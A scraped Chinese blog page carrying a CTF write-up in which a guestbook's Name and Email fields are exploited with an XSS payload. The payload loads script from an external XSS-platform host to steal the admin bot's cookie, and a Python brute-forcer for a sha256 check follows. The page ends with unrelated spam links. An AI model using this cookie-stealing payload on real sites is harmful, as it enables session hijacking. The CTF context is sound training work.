当前位置: 首页 > news >正文

湛江建设局网站2023全国企业公司大黄页

湛江建设局网站,2023全国企业公司大黄页,龙江网站建设,南宁网络知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XS…知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XSS攻击, 很容易看出来Name和Email两栏有XSS漏洞, 可以使用封闭input标签并插入一个script标签进行Cookie的获取. 这里我直接使用了一个XSS平台进行了payload构建, 可以自己搭服务器. payload: sCRiPt sRC//uj.ci/Qpae/sCrIpT 使用preview可以发现payload已被正常解析成了html语句, 后台也收到了cookie: 然后只需要暴力碰撞一下这个sha256即可发送至后台获取Admin的cookie. 碰撞代码的python源码: import hashlibdef sha256(s):return hashlib.sha256(s.encode(utf-8)).hexdigest()if __name__ __main__:def sha256Crack(token):for i in range(10000000000):# print(sha256(i))a sha256(f{i:04d})[:6] print(f\r{a}, end, flushTrue)if a token[:6]:print()return iprint()return Noneprint(sha256Crack(str(input())))拿到cookie就可以改cookie去/admin了, 直接打开就有flag辽
http://www.sadfv.cn/news/452163/

相关文章:

  • iis网站数据库失败谷歌关键词挖掘工具
  • o基础学建网站关于网站建设的通知
  • 网站建设a云世家宋南南南宁旅游网站建设
  • 开网站平台需要多少钱餐饮品牌设计服务
  • 外国做爰网站wordpress好吗
  • godaddy做网站建公司网站要多少钱
  • 做动漫网站北京建设网站设计
  • 一开始用php做网站重庆在线官网
  • 一诺互联网站建设公司湘潭营销网站建设
  • 做网站要哪些架包电子商务网站建设与管理第四章答案
  • 长泰建设局网站动效h5网站
  • wordpress如何修改背景图片网站建设与优化推广方案
  • 哪个网站的域名到期直接注册网站开发中点赞怎么做到的
  • 快速搭建一个网站北仑建设局网站
  • 广州互联网网站建设网站红色搭配
  • 小学生做网站上海游玩攻略必去的地方
  • 苏州网站定制江苏工程造价信息网
  • 织梦 网站设计wordpress标签链接
  • 从零开始做网站数据库自己装修设计app
  • 服务器和域名如何做网站雅安网站建设
  • 网站建设规划设计任务书如今做哪个网站能致富
  • 学做美食视频网站广告接单网站
  • 风险的网站怎么出现网站推广优化软件
  • 黑别人网站手机app手机网站开发
  • 做暧暖爱视频网站wordpress手动上传图片
  • 网站建设自查自评报告新网站优化怎么做
  • 德州专业网站制作哪家好淄博定制网站建设公司
  • 北京网站建设方案书宁波网络推广的公司报价
  • 深圳网站建设公司为什wordpress support hls player
  • 怎么做个网站演示网站内容优化方案